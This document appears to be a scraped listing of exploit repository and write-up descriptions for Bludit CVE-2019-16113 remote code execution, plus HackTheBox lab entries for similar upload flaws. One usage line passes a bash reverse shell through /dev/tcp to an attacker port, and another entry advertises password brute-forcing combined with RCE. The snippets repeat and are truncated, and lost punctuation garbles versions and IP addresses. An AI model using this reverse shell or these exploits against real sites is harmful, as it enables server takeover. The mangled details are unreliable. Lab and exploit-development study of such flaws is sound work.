CVE-2019-16113

CVE-2019-16113 This is a python implementaiton PoC for the Bludit Directory Traversal Image File Upload Vulnerability CVE-2019-16113 Bludit 392 allows remote code execution via bl-kernel/ajax/upload-imagesphp because PHP code can be entered with a jpg (or png) file name, and then this PHP code can write other PHP code to a / pathname Original credit: christasa - Origina

CVE-2019-16113 - bludit >= 3.9.2 RCE authenticate

CVE-2019-16113 CVE-2019-16113 - bludit >= 392 RCE authenticate Usage python CVE-2019-16113py -u 10101010 -user user -pass secret -c "bash -c 'bash -i >& /dev/tcp/101014172/1337 0>&1'" Example

ExploitDev Journey #4 | CVE-2019-16113 | Bludit 392 - Authenticated RCE Original Exploit: wwwexploit-dbcom/exploits/48701 Exploit name: Bludit 392 - Authenticated RCE CVE: 2019-16113 Lab: Blunder - HackTheBox Description There is a mis-configuration in image upload functionality of Bludit that allows an authenticated user to upload any type of file All you nee

ExploitDev Journey #5 | Gym Management 10 unauthenticated RCE Original Exploit: wwwexploit-dbcom/exploits/48506 Exploit name: Gym Management 10 unauthenticated RCE CVE: N\A Lab: Buff - HackTheBox Description There is an unrestricted image upload path within Gym management 10 web app that allows unauthenticated users to upload files The functionality also suffe

Bludit 3.9.2 - Remote command execution - CVE-2019-16113

Bludit 392 - Remote command execution - CVE-2019-16113 This exploit combines two exploits in Bludit CMS 392 to gain remote code execution on the target system The original exploits are CVE-2019-17240 & CVE-2019-16113 Features Bruteforce password + RCE Bruteforce username:password + RCE Reproduce Setup Bludit 392 CMS Configure login details run the exploit: p

ExploitDev Journey #8 | CVE-2019-11447 | CuteNews 212 - Authenticated Remote Command Execution Original Exploit: wwwexploit-dbcom/exploits/48800 Exploit name: CuteNews 212 Authenticated RCE CVE: 2019-11447 Lab: Passage - HackTheBox Description This application has a flaw that allows uploading image files if they look like images, it checks the beginning of the

ExploitDev Journey #5 | Gym Management 10 unauthenticated RCE Original Exploit: wwwexploit-dbcom/exploits/48506 Exploit name: Gym Management 10 unauthenticated RCE CVE: N\A Lab: Buff - HackTheBox Description There is an unrestricted image upload path within Gym management 10 web app that allows unauthenticated users to upload files The functionality also suffe

Bludit 3.9.2 Remote Command Execution (RCE)

CVE-2019-16113 Bludit 392 Remote Command Execution (RCE)

ExploitDev Journey #4 | CVE-2019-16113 | Bludit 392 - Authenticated RCE Original Exploit: wwwexploit-dbcom/exploits/48701 Exploit name: Bludit 392 - Authenticated RCE CVE: 2019-16113 Lab: Blunder - HackTheBox Description There is a mis-configuration in image upload functionality of Bludit that allows an authenticated user to upload any type of file All you nee

CVE-2019-16113

Bludit 3.9.2 - Remote command execution - CVE-2019-16113

Bludit 392 - Remote command execution - CVE-2019-16113 This exploit combines two exploits in Bludit CMS 392 to gain remote code execution on the target system The original exploits are CVE-2019-17240 & CVE-2019-16113 Features Bruteforce password + RCE Bruteforce username:password + RCE Reproduce Setup Bludit 392 CMS Configure login details run the exploit: p

Bludit >= 3.9.2 - Authenticated RCE (CVE-2019-16113)

CVE-2019-16113 PoC Bludit >= 392 Remote Code Execution Vulnerability via "Upload function" Simple Python PoC Discovery by @christasa: bludit/bludit#1081 Usage Edit the script with your URL, username, password and command to execute then run the script: $ python CVE-2019-16113py [+] Loggin successful [+] Token CSRF: 20b903ffe72490f004b9255521ea2e0419e73dce